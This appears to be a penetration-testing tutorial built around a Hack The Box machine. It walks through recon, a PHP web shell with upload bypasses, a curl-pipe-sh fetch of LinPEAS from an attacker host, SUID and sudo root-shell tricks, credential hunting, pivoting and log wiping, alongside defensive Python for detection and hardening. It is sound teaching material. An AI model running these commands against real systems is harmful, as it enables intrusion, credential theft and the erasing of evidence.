The Unseen Kill Chain: How I Pwned an HTB Machine and What It Reveals About Modern Linux Threats + Video

Introduction:

Penetration testing platforms like Hack The Box have become the modern-day proving ground for cybersecurity professionals, simulating real-world attacks in controlled environments. Successfully compromising a machine, such as the “FACTS” box in HTB’s Season 10, requires a blend of systematic reconnaissance, vulnerability exploitation, and post-compromise privilege escalation. This article deconstructs the underlying methodologies and technical commands that lead to such a “pwn,” transforming a celebratory post into an actionable learning blueprint for red teams and blue teams alike.

Learning Objectives:

  • Understand the core methodology for approaching an unknown HTB/Linux machine.
  • Learn practical commands for reconnaissance, exploitation, and privilege escalation on Linux systems.
  • Identify common misconfigurations and vulnerabilities that lead to full system compromise.

You Should Know:

1. The Reconnaissance Phase: Mapping the Attack Surface

Every successful penetration test begins with thorough enumeration. Before attacking, you must discover what you’re facing.

Network Scanning: Use `nmap` to discover open ports and services.

# Aggressive scan of the top 1000 ports with service detection (-O needs root)
sudo nmap -sV -sC -O -T4 <TARGET_IP>

# Full TCP port scan (slower but thorough)
nmap -p- -T4 <TARGET_IP>

# UDP scan for critical services (DNS, SNMP)
sudo nmap -sU --top-ports 100 <TARGET_IP>

Web Application Enumeration: If HTTP/HTTPS ports are open, enumerate directories, subdomains, and technologies.

# Directory brute-forcing with Gobuster
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt

# Technology fingerprinting with WhatWeb
whatweb http://<TARGET_IP>
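As an added defender's counterpart to the scans above (example code written for this commentary, not from the original post or from Hack The Box), the following Python parses netfilter LOG lines and flags any source that touches many distinct ports in a short window, which is what an `nmap -p-` sweep looks like from the target's side. The log lines, host names and thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed netfilter (iptables LOG target) lines, not real traffic: 10.0.0.5
# hits 12 distinct ports on 10.0.0.20 within three seconds, the shape an
# "nmap -p-" sweep leaves behind; 10.0.0.9 makes two ordinary connections
# minutes apart and must not be flagged.
SWEEP_PORTS = (21, 22, 23, 25, 53, 80, 110, 139, 443, 445, 3306, 8080)
SAMPLE_LOG = "\n".join(
    [f"Jun 12 10:00:0{i % 3} gw kernel: IN=eth0 SRC=10.0.0.5 DST=10.0.0.20 "
     f"PROTO=TCP SPT={40000 + i} DPT={p} SYN" for i, p in enumerate(SWEEP_PORTS)]
    + ["Jun 12 10:00:05 gw kernel: IN=eth0 SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=51000 DPT=443 SYN",
       "Jun 12 10:05:00 gw kernel: IN=eth0 SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=51001 DPT=22 SYN"]
)

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s.*?SRC=(?P<src>\S+)\s.*?"
    r"PROTO=(?P<proto>\S+)\s.*?DPT=(?P<dpt>\d+)"
)

def parse_events(text):
    """Yield (time, src, proto, dport) for each line the regex understands."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            # Syslog stamps carry no year; strptime defaults to 1900, which is
            # fine because only differences between stamps are used below.
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            yield ts, m["src"], m["proto"], int(m["dpt"])

def detect_sweeps(text, min_ports=10, window_s=60):
    """Return {src: sorted distinct ports} for every source that touched at
    least min_ports distinct destination ports inside some window_s window."""
    by_src = defaultdict(list)
    for ts, src, _proto, dport in parse_events(text):
        by_src[src].append((ts, dport))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            # distinct ports seen from this event until the window closes
            ports = {p for t, p in events[i:] if (t - start).total_seconds() <= window_s}
            if len(ports) >= min_ports:
                hits[src] = sorted(ports)
                break
    return hits
```

Tune `min_ports` and `window_s` to the environment; a slow `-T1` scan spreads the same ports over a much longer window and needs a larger one.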

2. Initial Foothold: Exploiting the First Vulnerability

The initial breach often comes from a vulnerable service or web application.

Analyzing Service Versions: Cross-reference discovered service versions (from nmap -sV) with databases like Exploit-DB or Searchsploit.

# Search for exploits locally using Searchsploit
searchsploit "Apache 2.4.49"

# Examine a specific exploit by its Exploit-DB ID
searchsploit -x 12345

Web Exploitation – File Upload Bypass: A common vector. If you find an upload function, test for bypasses.

<!-- Sample malicious PHP shell for upload -->
<?php system($_GET['cmd']); ?>

Try extensions: .php5, .phtml, .phar, or double extensions: shell.php.jpg.
Use Burp Suite to intercept and modify the `Content-Type` header to image/jpeg.
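Against the upload bypasses just listed, here is an added example (not from the original post) of the weak check beside a hardened one: the hardened version ignores the client's `Content-Type`, accepts only a single allow-listed extension so `shell.php.jpg` and `.phtml` never pass, verifies image magic bytes, and stores the file under a random server-side name. The function names and the allow list are assumptions made for this example.

```python
import os
import secrets

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Leading bytes of the formats we accept. The client's Content-Type header is
# never consulted because Burp (or curl) can set it to anything.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

def vulnerable_accept(filename, content_type):
    """The weak check the article's bypasses target: trusts the client's
    Content-Type and only looks at the last extension, so shell.php.jpg sent
    with a spoofed image/jpeg header passes."""
    return (content_type.startswith("image/")
            and filename.lower().endswith((".jpg", ".jpeg", ".png", ".gif")))

def hardened_accept(filename, data):
    """Accept only if the name has exactly one extension, that extension is
    allow-listed, and the first bytes match that format's magic. Returns the
    random server-side name to store under, or None to reject."""
    base = os.path.basename(filename)        # drop any path components
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:      # rejects shell.php.jpg and ".htaccess"
        return None
    ext = parts[1]
    if ext not in ALLOWED_EXT:               # .php5/.phtml/.phar never get this far
        return None
    if not data.startswith(MAGIC[ext]):      # content must be the claimed image type
        return None
    return f"{secrets.token_hex(16)}.{ext}"  # never reuse the client-supplied name
```

Storing uploads outside the web root, or where the web server will not execute scripts, closes the remaining gap if a check is ever bypassed.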

3. Establishing a Stable Shell: Upgrading Your Access

A basic web shell is unstable. Upgrade to a fully interactive TTY shell.


# On the victim machine, after gaining command execution:
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Background the shell with Ctrl+Z, then on your attacker machine:
stty raw -echo; fg

# Then reset the terminal and export environment variables
reset
export TERM=xterm
export SHELL=bash
stty rows 38 columns 116

4. Post-Exploitation Enumeration: Hunting for Privilege Escalation Vectors

The key to going from user to root lies in meticulous internal enumeration.


Manual Linux Enumeration:

# Check sudo permissions
sudo -l

# Look for SUID/SGID binaries
find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -g=s 2>/dev/null

# Check for world-writable files or directories
find / \( -type f -o -type d \) -perm -o=w 2>/dev/null

# Look for cron jobs (system crontab, cron.d and per-user spool)
crontab -l
ls -la /etc/cron* /var/spool/cron 2>/dev/null

# Check for readable sensitive files
cat /etc/passwd
cat /etc/shadow 2>/dev/null

Automated Enumeration Scripts: Use tools like LinPEAS for a comprehensive sweep.

# Transfer LinPEAS to the victim machine and run it
curl -L http://<ATTACKER_IP>/linpeas.sh | sh

5. Privilege Escalation: Exploiting Misconfigurations

A common vector is exploiting a SUID binary or a writable service running as root.

SUID Binary Exploit (e.g., find): If `find` has the SUID bit set, you can escalate.

# Using find to spawn a root shell
find / -exec /bin/sh \; -quit

Exploiting Sudo Rights (e.g., vi/vim): If a user can run `vi` as root via sudo.

sudo vim -c ':!/bin/sh'

Kernel Exploitation: As a last resort, if a kernel vulnerability exists.

# Identify kernel version
uname -a

# Search for an appropriate exploit, compile, and run
gcc exploit.c -o exploit
chmod +x exploit
./exploit
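The SUID and sudo findings in sections 4 and 5 are exactly what a host audit should catch before an attacker does. This added Python (not from the original post) parses constructed `find -perm -u=s` and `sudo -l` output and grades each entry; the baseline set, the sample host "facts" and the user "dev" are assumptions made for the example.

```python
import os

# Constructed baseline of binaries that are SUID root on a stock Debian/Ubuntu
# install; in practice compare against a golden image or dpkg/rpm verification.
EXPECTED_SUID = {"passwd", "sudo", "su", "mount", "umount", "ping", "chsh",
                 "chfn", "newgrp", "gpasswd"}
# Binaries the article shows escaping to a root shell (find -exec, vim -c :!sh).
SHELL_ESCAPE = {"find", "vi", "vim", "sh", "bash"}

# Constructed `find / -type f -perm -u=s` output and `sudo -l` output for a
# hypothetical user "dev"; neither is taken from a real host.
SAMPLE_SUID = ["/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/find",
               "/usr/bin/mount", "/opt/backup/helper"]
SAMPLE_SUDO_L = """\
User dev may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx
"""

def audit_suid(paths):
    """Return (severity, path) for each SUID file outside the baseline:
    'critical' if it escapes to a shell, 'review' if merely unexpected."""
    findings = []
    for path in paths:
        name = os.path.basename(path)
        if name in SHELL_ESCAPE:
            findings.append(("critical", path))
        elif name not in EXPECTED_SUID:
            findings.append(("review", path))   # verify owner/package before deciding
    return findings

def audit_sudo(text):
    """Parse `sudo -l` rule lines '(runas) [TAGS:] command args' and return
    (severity, binary, nopasswd) per rule; header lines are skipped."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("("):
            continue
        _runas, _, spec = line.partition(")")
        tags, _, cmd = spec.strip().rpartition(":")   # tags empty if no colon
        argv = cmd.split()
        if not argv:
            continue
        binary = os.path.basename(argv[0])
        severity = "critical" if binary in SHELL_ESCAPE else "review"
        findings.append((severity, binary, "NOPASSWD" in tags))
    return findings
```

A 'review' hit such as `/opt/backup/helper` is worth checking against its package owner and change history; an unexpected SUID file in a writable directory is the cron/SUID combination the article warns about.
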

6. Lateral Movement & Pivoting (If Applicable in the Network)

In more complex environments, you may need to move from one compromised host to another.

Dumping Credentials: Search for passwords in config files, history, or memory.

# Search for files containing the word "password"
grep -ri "password" /home /opt /var/www 2>/dev/null

# Check bash history
cat ~/.bash_history

SSH Pivoting: Use SSH to create a tunnel to access an internal network.

# Create a dynamic SOCKS proxy via the compromised host
ssh -D 1080 user@<COMPROMISED_IP> -f -N
# Then configure proxychains to route tools through this tunnel

7. Covering Tracks & Forensic Awareness (For CTFs & Ethical Practice)

Understanding how attacks are logged is crucial for both attackers and defenders.


Clearing Logs (Demonstrative):

# Clear current user's history
history -c

# Overwrite and delete the history file
shred -zu ~/.bash_history

# Truncate wtmp (requires root); note this wipes every login record, not one user's entry,
# which is itself a loud indicator for defenders
echo "" > /var/log/wtmp

Note: In real engagements, this is done only within strict rules of engagement. In CTFs like HTB, it’s often unnecessary.

What Undercode Say:

  • Methodology Over Tools: The specific tool matters less than the underlying process: Recon, Foothold, Enumeration, Escalation. Mastering this cycle is more valuable than memorizing a thousand exploits.
  • Context is King: Automated scripts like LinPEAS are invaluable, but they generate noise. The real skill lies in manually interpreting findings—understanding why a writable cron job or a specific SUID binary is a critical vulnerability in that particular system’s context.

Analysis: Jean Hurtado’s post, adorned with certifications like eJPTv2 and ISO 27001, underscores a vital trend: the cybersecurity industry increasingly values demonstrable, hands-on skill alongside formal knowledge frameworks. Platforms like Hack The Box bridge the gap between theory and the chaotic reality of offensive security. The “FACTS” machine compromise isn’t just a badge; it’s a microcosm of a real-world attack chain, from external enumeration to root dominance. It highlights that persistent threats often stem not from zero-days, but from unpatched services, misconfigurations, and weak credential hygiene—all issues that robust internal enumeration can uncover.

Prediction:

The future of penetration testing and threat simulation will be deeply intertwined with AI and automation. We will see AI-assisted reconnaissance that dynamically prioritizes attack vectors, and automated penetration testing platforms that can continuously probe for new vulnerabilities as systems update. However, the human element—the creative thinking required to chain together unconventional vulnerabilities, as often needed in HTB—will remain irreplaceable. The rise of these platforms will consequently push the industry towards a “continuous penetration testing” model, integrating red team tactics directly into DevOps (DevSecOps) pipelines, making security an ongoing, dynamic process rather than a periodic audit.

Reported By: Jean Hurtado – Hackers Feeds